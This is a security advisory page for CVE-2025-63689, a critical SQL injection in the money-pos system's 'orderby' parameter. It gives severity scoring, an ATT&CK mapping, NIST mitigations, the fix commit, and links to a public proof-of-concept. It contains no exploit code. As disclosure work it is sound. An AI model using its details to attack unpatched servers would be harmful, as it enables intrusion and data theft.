CVE-2025-63689
Published: 07 November 2025
Summary
CVE-2025-63689 is a critical-severity SQL Injection (CWE-89) vulnerability in Ycf1998 Money-Pos. Its CVSS base score is 10.0 (Critical).
Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked in the top 42.7% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Deeper analysis
CVE-2025-63689 is a set of multiple SQL injection vulnerabilities (CWE-89) affecting the ycf1998 money-pos system prior to commit 11f276bd20a41f089298d804e43cb1c39d041e59, released on 2025-09-14. These flaws allow a remote attacker to execute arbitrary code by exploiting the orderby parameter. The vulnerability carries a CVSS v3.1 base score of 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), indicating critical severity due to its network accessibility, low attack complexity, lack of required privileges or user interaction, and potential for scope change with high impacts across confidentiality, integrity, and availability.
Any unauthenticated remote attacker can exploit this vulnerability over the network with minimal effort. Successful exploitation enables arbitrary code execution on the affected system, potentially leading to full server compromise, data exfiltration, or further lateral movement within the environment.
Mitigation is available via the patching commit at https://github.com/ycf1998/money-pos/commit/11f276bd20a41f089298d804e43cb1c39d041e59. Additional details, including a proof-of-concept, are documented in the GitHub issue at https://github.com/ycf1998/money-pos/issues/3 and a related gist at https://gist.github.com/LockeTom/2ed0f3751c88542f48b7c230468d2a46. Security practitioners should verify and apply the update immediately on affected deployments.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-38273
Vulnerability details
Multiple SQL injection vulnerabilitites in ycf1998 money-pos system before commit 11f276bd20a41f089298d804e43cb1c39d041e59 (2025-09-14) allows a remote attacker to execute arbitrary code via the orderby parameter
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
The SQL injection vulnerability in a public-facing web application (money-pos system) allows unauthenticated remote attackers to achieve arbitrary code execution, directly mapping to T1190: Exploit Public-Facing Application.
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
SI-10 directly prevents SQL injection vulnerabilities by requiring validation of untrusted inputs like the orderby parameter to ensure they do not alter SQL queries.
SI-2 mandates timely identification, reporting, and patching of flaws such as the SQL injection issues fixed in the specified commit.
SC-7 enables boundary protection devices like web application firewalls to inspect and block malicious SQL injection payloads targeting the orderby parameter.